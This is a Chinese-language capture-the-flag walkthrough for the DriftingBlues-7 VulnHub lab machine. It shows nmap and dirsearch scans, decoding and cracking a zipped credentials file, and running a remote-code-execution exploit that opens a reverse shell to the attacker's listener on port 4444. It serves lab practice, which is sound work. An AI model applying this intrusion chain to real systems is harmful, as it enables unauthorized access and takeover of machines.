靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
题目的目标是要夺到里面的flag,搭建好环境如图。
首先用nmap扫描一下ip地址
nmap -sP 192.168.110.1/24 #扫描网段中存活主机
nmap -p- 192.168.110.167 #在看看上面运行的服务
nmap -sV 192.168.110.167 #查看服务版本
上面运行的一些apache、ssh所在版本都没有漏洞,所以我们从它的80端口入手。访问80端口会被跳转到如下页面
这里尝试了弱口令,暴力破解都没有猜解到密码,所以我们可以先去扫描一下它的目录结构。
扫描出来的目录也没有发现什么有价值的东西。所以只能从其他的端口进行切入了。上面扫描ip上运行的端口发现上面还有一些其他的端口,其中有一个66端口。
上面运行了一个SimpleHttpServer 0.6,所以我们进行访问。
接下来再去扫描一下它的目录结构
扫描出一个index_files文件夹,进行访问
但是里面并没有发现什么有价值的东西,然后就卡了好久,但是感觉就有一种的洞就在这里的感觉。后来打开kali用dirsearch去爆破了下目录。
python3 dirsearch.py -u http://192.168.110.167:66 -w /usr/share/wordlists/dirbuster/
发现有了另外的收获,吓得我赶快去访问试一试。
下载了一个是文件下来,打开看看。
有点相base64编码后的字符串,那我们用base64解码试一试。
PK开头,熟悉压缩包的师傅都懂了吧,这应该是一个压缩包文件了。那我们把解码后的字符串复制出来写进一个zip文件里面去,但是发现写不进去。
那我们在kali上打开进行base64解码然后输出
cat eon | base64 -d>eon.zip
然后解压发现需要密码
要密码那只好爆破了
然后打开creds.txt文件可以看到账号密码
那我们回到80端口进行登陆
登陆成功
在上图可以看到版本,接下来我们搜索该版本存在什么漏洞。
有个远程代码执行漏洞,把下方exp保存到kali
现在kali上监听4444端口
然后运行脚本
python3 1.py https://192.168.110.167/ -ip 192.168.110.164 -port 4444
接收到shell,然后就是寻找flag的位置了。然后发现在root目录下